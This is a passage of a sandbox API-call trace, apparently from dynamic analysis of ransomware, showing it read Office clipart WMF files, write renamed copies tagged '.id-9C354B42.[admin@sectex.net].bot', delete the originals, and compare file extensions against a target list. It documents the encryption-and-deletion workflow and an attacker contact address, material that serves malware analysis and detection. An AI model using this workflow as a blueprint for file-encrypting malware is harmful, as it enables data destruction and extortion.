	[0169.166] ReadFile (in: hFile=0x3b8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.166] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.166] SetEndOfFile (hFile=0x398) returned 1
	[0169.166] CloseHandle (hObject=0x398) returned 1
	[0169.166] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.167] SetEndOfFile (hFile=0x3b8) returned 1
	[0169.169] CloseHandle (hObject=0x3b8) returned 1
	[0169.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.169] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf")) returned 1
	[0169.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63
	[0169.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63
	[0169.170] lstrlenW (lpString=".doc") returned 4
	[0169.170] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.170] lstrlenW (lpString=".docx") returned 5
	[0169.170] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.170] lstrlenW (lpString=".pdf") returned 4
	[0169.170] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.170] lstrlenW (lpString=".xls") returned 4
	[0169.170] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.170] lstrlenW (lpString=".xlsx") returned 5
	[0169.170] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.170] lstrlenW (lpString=".ppt") returned 4
	[0169.170] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63
	[0169.170] lstrlenW (lpString=".zip") returned 4
	[0169.170] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.170] lstrlenW (lpString=".rar") returned 4
	[0169.170] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.170] lstrlenW (lpString=".bz2") returned 4
	[0169.170] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.170] lstrlenW (lpString=".7z") returned 3
	[0169.170] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63
	[0169.170] lstrlenW (lpString=".dbf") returned 4
	[0169.171] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63
	[0169.171] lstrlenW (lpString=".1cd") returned 4
	[0169.171] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63
	[0169.171] lstrlenW (lpString=".jpg") returned 4
	[0169.171] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63
	[0169.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63
	[0169.171] lstrlenW (lpString=".doc") returned 4
	[0169.171] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.171] lstrlenW (lpString=".docx") returned 5
	[0169.171] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.171] lstrlenW (lpString=".pdf") returned 4
	[0169.171] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.171] lstrlenW (lpString=".xls") returned 4
	[0169.171] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.171] lstrlenW (lpString=".xlsx") returned 5
	[0169.171] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.171] lstrlenW (lpString=".ppt") returned 4
	[0169.171] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63
	[0169.171] lstrlenW (lpString=".zip") returned 4
	[0169.171] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.171] lstrlenW (lpString=".rar") returned 4
	[0169.171] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.171] lstrlenW (lpString=".bz2") returned 4
	[0169.171] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.171] lstrlenW (lpString=".7z") returned 3
	[0169.171] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63
	[0169.171] lstrlenW (lpString=".dbf") returned 4
	[0169.171] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63
	[0169.172] lstrlenW (lpString=".1cd") returned 4
	[0169.172] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 63
	[0169.172] lstrlenW (lpString=".jpg") returned 4
	[0169.172] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.172] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.172] lstrlenW (lpString="J0152882.WMF") returned 12
	[0169.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0169.172] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=9072) returned 1
	[0169.172] CloseHandle (hObject=0x3b8) returned 1
	[0169.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf")) returned 0x20
	[0169.173] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0169.173] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.173] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0169.174] GetLastError () returned 0x0
	[0169.174] ReadFile (in: hFile=0x3b8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2370, lpOverlapped=0x0) returned 1
	[0169.186] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2380, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2380, lpOverlapped=0x0) returned 1
	[0169.187] ReadFile (in: hFile=0x3b8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.187] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.187] SetEndOfFile (hFile=0x398) returned 1
	[0169.187] CloseHandle (hObject=0x398) returned 1
	[0169.187] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.187] SetEndOfFile (hFile=0x3b8) returned 1
	[0169.189] CloseHandle (hObject=0x3b8) returned 1
	[0169.189] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.190] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152882.wmf")) returned 1
	[0169.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63
	[0169.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63
	[0169.190] lstrlenW (lpString=".doc") returned 4
	[0169.190] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.190] lstrlenW (lpString=".docx") returned 5
	[0169.190] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0169.190] lstrlenW (lpString=".pdf") returned 4
	[0169.190] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.190] lstrlenW (lpString=".xls") returned 4
	[0169.190] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.190] lstrlenW (lpString=".xlsx") returned 5
	[0169.190] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0169.191] lstrlenW (lpString=".ppt") returned 4
	[0169.191] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63
	[0169.191] lstrlenW (lpString=".zip") returned 4
	[0169.191] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.191] lstrlenW (lpString=".rar") returned 4
	[0169.191] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.191] lstrlenW (lpString=".bz2") returned 4
	[0169.191] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.191] lstrlenW (lpString=".7z") returned 3
	[0169.191] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63
	[0169.191] lstrlenW (lpString=".dbf") returned 4
	[0169.191] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63
	[0169.191] lstrlenW (lpString=".1cd") returned 4
	[0169.191] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63
	[0169.191] lstrlenW (lpString=".jpg") returned 4
	[0169.191] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63
	[0169.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63
	[0169.191] lstrlenW (lpString=".doc") returned 4
	[0169.191] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.191] lstrlenW (lpString=".docx") returned 5
	[0169.191] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0169.191] lstrlenW (lpString=".pdf") returned 4
	[0169.191] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.191] lstrlenW (lpString=".xls") returned 4
	[0169.191] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.191] lstrlenW (lpString=".xlsx") returned 5
	[0169.191] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0169.191] lstrlenW (lpString=".ppt") returned 4
	[0169.191] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63
	[0169.192] lstrlenW (lpString=".zip") returned 4
	[0169.192] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.192] lstrlenW (lpString=".rar") returned 4
	[0169.192] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.192] lstrlenW (lpString=".bz2") returned 4
	[0169.192] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.192] lstrlenW (lpString=".7z") returned 3
	[0169.192] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63
	[0169.192] lstrlenW (lpString=".dbf") returned 4
	[0169.192] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63
	[0169.192] lstrlenW (lpString=".1cd") returned 4
	[0169.192] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 63
	[0169.192] lstrlenW (lpString=".jpg") returned 4
	[0169.192] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.192] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.192] lstrlenW (lpString="J0152890.WMF") returned 12
	[0169.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152890.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0169.317] GetFileSizeEx (in: hFile=0x180, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=1940) returned 1
	[0169.317] CloseHandle (hObject=0x180) returned 1
	[0169.317] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152890.wmf")) returned 0x20
	[0169.317] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152890.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152890.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0169.318] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.318] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152890.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.353] GetLastError () returned 0x0
	[0169.353] ReadFile (in: hFile=0x180, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x794, lpOverlapped=0x0) returned 1
	[0169.358] WriteFile (in: hFile=0x17c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x7a0, lpOverlapped=0x0) returned 1
	[0169.359] ReadFile (in: hFile=0x180, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.359] WriteFile (in: hFile=0x17c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.359] SetEndOfFile (hFile=0x17c) returned 1
	[0169.360] CloseHandle (hObject=0x17c) returned 1
	[0169.360] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.360] SetEndOfFile (hFile=0x180) returned 1
	[0169.362] CloseHandle (hObject=0x180) returned 1
	[0169.362] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.368] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152890.wmf")) returned 1
	[0169.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 63
	[0169.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 63
	[0169.374] lstrlenW (lpString=".doc") returned 4
	[0169.374] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.374] lstrlenW (lpString=".docx") returned 5
	[0169.374] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0169.374] lstrlenW (lpString=".pdf") returned 4
	[0169.374] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.374] lstrlenW (lpString=".xls") returned 4
	[0169.374] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.374] lstrlenW (lpString=".xlsx") returned 5
	[0169.374] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0169.374] lstrlenW (lpString=".ppt") returned 4
	[0169.375] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 63
	[0169.375] lstrlenW (lpString=".zip") returned 4
	[0169.375] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.375] lstrlenW (lpString=".rar") returned 4
	[0169.375] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.375] lstrlenW (lpString=".bz2") returned 4
	[0169.375] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.375] lstrlenW (lpString=".7z") returned 3
	[0169.375] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 63
	[0169.375] lstrlenW (lpString=".dbf") returned 4
	[0169.375] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 63
	[0169.375] lstrlenW (lpString=".1cd") returned 4
	[0169.375] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 63
	[0169.375] lstrlenW (lpString=".jpg") returned 4
	[0169.375] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 63
	[0169.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 63
	[0169.375] lstrlenW (lpString=".doc") returned 4
	[0169.375] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.375] lstrlenW (lpString=".docx") returned 5
	[0169.375] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0169.375] lstrlenW (lpString=".pdf") returned 4
	[0169.375] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.375] lstrlenW (lpString=".xls") returned 4
	[0169.375] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.375] lstrlenW (lpString=".xlsx") returned 5
	[0169.375] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0169.375] lstrlenW (lpString=".ppt") returned 4
	[0169.375] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.375] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 63
	[0169.376] lstrlenW (lpString=".zip") returned 4
	[0169.376] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.376] lstrlenW (lpString=".rar") returned 4
	[0169.376] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.376] lstrlenW (lpString=".bz2") returned 4
	[0169.376] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.376] lstrlenW (lpString=".7z") returned 3
	[0169.376] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 63
	[0169.376] lstrlenW (lpString=".dbf") returned 4
	[0169.376] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 63
	[0169.376] lstrlenW (lpString=".1cd") returned 4
	[0169.376] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 63
	[0169.376] lstrlenW (lpString=".jpg") returned 4
	[0169.376] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.376] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.376] lstrlenW (lpString="J0153265.WMF") returned 12
	[0169.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153265.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.377] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3008) returned 1
	[0169.377] CloseHandle (hObject=0x17c) returned 1
	[0169.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153265.wmf")) returned 0x20
	[0169.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153265.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153265.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.377] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.377] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153265.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.378] GetLastError () returned 0x0
	[0169.378] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xbc0, lpOverlapped=0x0) returned 1
	[0169.382] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xbd0, lpOverlapped=0x0) returned 1
	[0169.383] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.383] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
